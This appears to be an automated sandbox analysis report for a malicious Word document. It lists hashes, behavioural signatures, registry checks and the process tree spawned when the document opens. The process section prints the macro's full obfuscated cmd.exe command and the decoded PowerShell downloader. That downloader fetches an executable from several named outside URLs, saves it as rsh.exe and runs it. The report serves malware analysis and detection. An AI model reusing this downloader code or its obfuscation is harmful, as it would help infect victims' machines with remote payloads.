Analysis
- max time kernel: 143s
- max time network: 128s
- platform: windows10-2004_x64
- resource: win10v2004-20240508-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 19-05-2024 20:34
Behavioral task: behavioral1
- Sample: 5b5523e3de0be3f3888924ee205feefc_JaffaCakes118.doc
- Resource: win7-20240508-en
Behavioral task: behavioral2
- Sample: 5b5523e3de0be3f3888924ee205feefc_JaffaCakes118.doc
- Resource: win10v2004-20240508-en
General
- Target: 5b5523e3de0be3f3888924ee205feefc_JaffaCakes118.doc
- Size: 87KB
- MD5: 5b5523e3de0be3f3888924ee205feefc
- SHA1: 57a0ded868c84a681e05aacfa483e9cf2bdd0875
- SHA256: 6fc0496f0b92374c976b56da6a0e3aa03bd960a04207a0354b0f2ba6c2654be9
- SHA512: 0049a31b6e8fb45d7fddf1b98beda860b8ce21d21ac74efc1a9018ab6b494180b05580a5842a223462d8c1170c16ea7439bf9aff38004b73de145445f3ffbf71
- SSDEEP: 1536:+Bocn1kp59gxBK85fBnx+amHIUAHcAdAbRjf7ZD+gB:X41k/W487oRnZlB
Malware Config
Signatures
- Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes (description / pid / pid_target / process / target process):
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process / 2368 / 228 / cmd.exe / WINWORD.EXE
- Blocklisted process makes network request (5 IoCs)
Processes (flow / pid / process):
  35 / 5028 / powershell.exe
  37 / 5028 / powershell.exe
  39 / 5028 / powershell.exe
  44 / 5028 / powershell.exe
  46 / 5028 / powershell.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes (description / ioc / process):
  Key opened / \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 / WINWORD.EXE
  Key value queried / \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz / WINWORD.EXE
  Key value queried / \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString / WINWORD.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes (description / ioc / process):
  Key opened / \REGISTRY\MACHINE\Hardware\Description\System\BIOS / WINWORD.EXE
  Key value queried / \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily / WINWORD.EXE
  Key value queried / \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU / WINWORD.EXE
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes (pid / process):
  228 / WINWORD.EXE
  228 / WINWORD.EXE
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes (pid / process):
  5028 / powershell.exe
  5028 / powershell.exe
  5028 / powershell.exe
  5052 / powershell.exe
  5052 / powershell.exe
  5052 / powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes (description / pid / process):
  Token: SeDebugPrivilege / 5028 / powershell.exe
  Token: SeDebugPrivilege / 5052 / powershell.exe
- Suspicious use of SetWindowsHookEx (7 IoCs)
Processes (pid / process):
  228 / WINWORD.EXE (7 occurrences)
- Suspicious use of WriteProcessMemory (8 IoCs)
Processes (description / pid / process / target process):
  PID 228 wrote to memory of 2368 / 228 / WINWORD.EXE / cmd.exe
  PID 228 wrote to memory of 2368 / 228 / WINWORD.EXE / cmd.exe
  PID 2368 wrote to memory of 4888 / 2368 / cmd.exe / cmd.exe
  PID 2368 wrote to memory of 4888 / 2368 / cmd.exe / cmd.exe
  PID 4888 wrote to memory of 5028 / 4888 / cmd.exe / powershell.exe
  PID 4888 wrote to memory of 5028 / 4888 / cmd.exe / powershell.exe
  PID 5028 wrote to memory of 5052 / 5028 / powershell.exe / powershell.exe
  PID 5028 wrote to memory of 5052 / 5028 / powershell.exe / powershell.exe
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (process tree depth 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5b5523e3de0be3f3888924ee205feefc_JaffaCakes118.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID: 228
- C:\Windows\System32\cmd.exe (process tree depth 2)
  Command line: "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe /V/C"set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'*ZM*' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell "!jtC:*jtC!=!" "
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID: 2368
- C:\Windows\system32\cmd.exe (process tree depth 3)
  Command line: C:\Windows\system32\cmd.exe /V/C"set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'*ZM*' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell "!jtC:*jtC!=!" "
  - Suspicious use of WriteProcessMemory
  PID: 4888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (process tree depth 4)
  Command line: powershell "powershell $ztF='wwH';$wLj='http://sphinx-tour.com/my1fugwV@http://egyptecotours.com/Aaw5tZ@http://secretariaextension.unt.edu.ar/wp-content/00002/l24wo4I@http://venturemeets.com/GeQdV4@http://nowley-rus.ru/administrator/cache/tguHgQZ'.Split('@');$Zim=([System.IO.Path]::GetTempPath()+'\rsh.exe');$oFp =New-Object -com 'msxml2.xmlhttp';$Wci = New-Object -com 'adodb.stream';foreach($Nkk in $wLj){try{$oFp.open('GET',$Nkk,0);$oFp.send();If ($oFp.responsetext -like '*MZ*') {$Wci.open();$Wci.type = 1;$Wci.write($oFp.responseBody);$Wci.savetofile($Zim);Start-Process $Zim;break}}catch{}} "
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 5028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (process tree depth 5)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =wwH
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 5052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (process tree depth 1)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4396,i,7012731823941922179,12386606396608877869,262144 --variations-seed-version --mojo-platform-channel-handle=4252 /prefetch:8
  PID: 4548
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl
  Filesize: 262KB
  MD5: 51d32ee5bc7ab811041f799652d26e04
  SHA1: 412193006aa3ef19e0a57e16acf86b830993024a
  SHA256: 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
  SHA512: 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810